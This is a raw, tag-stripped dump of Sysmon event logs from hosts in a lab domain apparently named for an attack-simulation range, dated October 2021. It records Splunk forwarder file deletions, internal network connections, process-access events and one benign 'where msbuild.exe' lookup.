AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99F9A302DCC9E86CAB66B2B6DE43CFE5,SHA256=70AD2CAC483B3EBB95C84A27832B8CFC3C10C3EDD29B1288EBD2F1F004B260FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083290Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:07.282{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCF7A96BABC58DB226DCCBDD501DAE7E,SHA256=21339933FEEA8859563A7BBB65CBFCF41A147C22751956A07341803D3723B5D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107283Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:08.575{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=334EF338587B0BE671D89CD9C657E64A,SHA256=1F70DBCD0C461798124DA0CB055B2914F72058619324AE51BC365FF9A5D7CCA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083291Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:08.282{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7BD2BFB2B20545A5027E82FC883F522,SHA256=46F9A4E03A0E2CB44EA02A7C362755D92D58EB3E186546E9A7F66675E4DA4BEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107284Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:09.626{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6452A039798D7D14A83C95387BE97528,SHA256=F3476C694126061D40BDB94C00CE59DAE099FC872588600D08F5DFC4EB1C9362,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083292Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:09.282{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25D452623B9C46CC918A58E7FACB4D45,SHA256=49EE0C230C54A74CFE02DEAD538B6A31B0331DAE8EABC0DFEBB6BF1F71A5B3F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107286Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:10.643{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25D4B0F0DBBEF1C499D543D011F9C707,SHA256=AB1A2582C4A548044F37BC3143BFDDE4FCB14E8F2B40CD78AC0E5ECFD93518B7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083294Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:08.743{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50153-false10.0.1.12-8000- 23542300x800000000000000083293Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:10.282{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=144C349D45FEE66740811DB279ECCD59,SHA256=3DDE420286318CC0DE9EFC5D01D33C2A3BDE17260A14EE6A2BFAE452C4969D7A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107285Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:08.485{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51876-false10.0.1.12-8000- 23542300x8000000000000000107296Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:11.658{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A359D6F4AA2940A2F3270513797DF99,SHA256=A22AE76B3C985B726635478DE148DEA9C9BA7C9760C8D60BAFEFD77FF925FF70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083296Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:11.941{2FDD8D40-AC9A-615A-1C00-00000000FD01}1896NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a5ffc3526a1e15c5\channels\health\respondent-20211004072621-033MD5=CD243B6FFA786E96F03F03FFF6EEA1F9,SHA256=BD72F37F00391F7EDFD796CB74D802386D2E764AAC9DEBCA5D4587784D6F99D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083295Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:11.282{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A3A15AE453B841AB769F25850A5B2F5,SHA256=1105B81E573D501DEA3CBC936811D7409218B1E6C44AF9271ADCEE58BF699C51,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000107295Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:11.489{58E9C193-ACA8-615A-1500-00000000FC01}11281216C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107294Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:11.489{58E9C193-B24B-615A-CB01-00000000FC01}7126888C:\Windows\system32\conhost.exe{58E9C193-B4C7-615A-5A02-00000000FC01}8108C:\Windows\system32\where.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107293Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:11.489{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107292Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:11.489{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107291Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:11.489{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107290Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:11.489{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107289Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:11.489{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B4C7-615A-5A02-00000000FC01}8108C:\Windows\system32\where.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107288Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:11.489{58E9C193-B24B-615A-CA01-00000000FC01}7802912C:\Windows\system32\cmd.exe{58E9C193-B4C7-615A-5A02-00000000FC01}8108C:\Windows\system32\where.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+1ace3|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107287Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:11.491{58E9C193-B4C7-615A-5A02-00000000FC01}8108C:\Windows\System32\where.exe10.0.14393.0 (rs1_release.160715-1616)Where - Lists location of filesMicrosoft® Windows® Operating SystemMicrosoft Corporationwhere.exewhere msbuild.exeC:\Users\Administrator\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=165B6C8CE23CBA9CD586436BDDFE7E1F,SHA256=F949863F5E351EEB5054F04F181FE582E98CB322100956ED938538523258440C,IMPHASH=08BEE970E209118AFE6C6116C60632CB{58E9C193-B24B-615A-CA01-00000000FC01}780C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" 23542300x8000000000000000107299Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:12.688{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A61A15C8CFC0A2FFCB3F0AFFB2E9F75,SHA256=9C40DBA79BF5D89096F36C6248B8CAB4B2FD8534407835CA0026BE48795D5831,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083298Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:12.955{2FDD8D40-AC9A-615A-1C00-00000000FD01}1896NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a5ffc3526a1e15c5\channels\health\surveyor-20211004072618-034MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083297Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:12.283{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CB2D0546A0311C9F4E5F44E9369D80C,SHA256=97AB2994BB22FE5BF3592F6434E3120BB960B7C9B5D97A8C1D98E2E23FDF65D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107298Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:12.504{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BEB151B043A70517F8F47DDF0793738D,SHA256=A71EC093E5C5EA461942694CF6CDC9F0A04F03BC70EE74FC5D5EF8903A3B83D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107297Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:12.504{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=185F46DD82743D38CFD320B89061D02C,SHA256=EFD21F73C83591FE7F6695DDC067C83E257EA6D544E3B5D74731FE02347A04E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107300Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:13.703{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B37771229BBD532AAD151F4F2F74382,SHA256=945F22500E0CFB315AF409317A044DD0CA41471D88F01005A2B2F6FA2015AC60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083299Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:13.297{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92297AAE87935866516F2AA01A291107,SHA256=2DBD8B04F15D0398C8D10DA7F99648153CEEFA73F732E6622D4521ADDE2EFB73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107301Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:14.720{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EA3CE02B34C072023D686BEF2D7355D,SHA256=436ECFEDBAA7F94FD997BFAED7C0061726EC19765F0955DA7505FA4CE2EABEAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083300Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:14.299{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BC337A31D47B8645EAFB9181FC12D9E,SHA256=9EA9B54693F45364B4E560374EE30487785A556EF12B0932EFF152789BA3DAC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107302Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:15.739{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF61ABC268BDB69710E346A9B3278AC6,SHA256=6DB9FF24385C0B331261AC2DCBDECE714AE433FB13CC022668285F6FEB182707,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083301Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:15.299{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A33D500AE9467BAA59E954F28100976,SHA256=9530D88F15503D6A71E564B50AC4BA34B0713BA2C47B8A2F699AFB68CD54DC50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107304Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:16.755{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82C1F7A8FF03BB76ECA8CF1AF55070C2,SHA256=A8267E65CC54BA0A0C3621FA879AEF53E9E6022DFFB256C5C9DAC27111D31B90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083302Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:16.299{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F2C4F14FE1BE0DCD82F88BC8A7ECC35,SHA256=9024C2B9C74CE108216C792EC0B42F0EB1402D3B197390F6444624C812601E2E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107303Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:14.363{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51877-false10.0.1.12-8000- 23542300x8000000000000000107305Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:17.785{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=277B754E5F5E157E4908569E4E425469,SHA256=FC84F7DD6DD54DAD1C38D8AE580F045A56DC97E768490DD2C32862372995961D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083304Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:17.312{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A11F3C40FC7B2145251E92C160B31872,SHA256=9D7AD0D0414225175A497A4354BBE5F533ADDC9C84CB1009C064BF0031D87817,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083303Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:14.713{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50154-false10.0.1.12-8000- 23542300x8000000000000000107306Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:18.800{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=619977D81651D45704F4051A906E3678,SHA256=0D8AE328AFDF19304DE00F12F5E2B540ED65972D798904E337B9513442922289,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083305Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:18.312{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF2F2C7FD990C7CF6508D4562AF56D4A,SHA256=8C7182A63A0830E941D1F3457FE66CC242AAB16ECC4843D4B95353F085538CB1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107308Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:19.817{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=285821E32D040364EB22B13A9290EEBC,SHA256=9939B6490A61F68D43DDF11D30E7EA198B8FF2681E7D34AA75F397D98C9E3F96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083307Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:19.312{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D74780E064B97E8DE9FF3C6C8825A6BD,SHA256=A2D18CEB5B66A723C79F3E6ECFCEB13D079D963C321564BBC0C3599D95E547B5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000107307Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:19.536{58E9C193-AE66-615A-C000-00000000FC01}46564748C:\Windows\system32\taskhostw.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000083306Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:19.046{2FDD8D40-AC9A-615A-1200-00000000FD01}996NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=960B99FE8DFE5116E513102EA3B888F1,SHA256=9393838F1DB562BAB59C2BBCEED6C20B6EE7DD3F5C4A550B2108D40BAC33C611,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107309Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:20.835{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 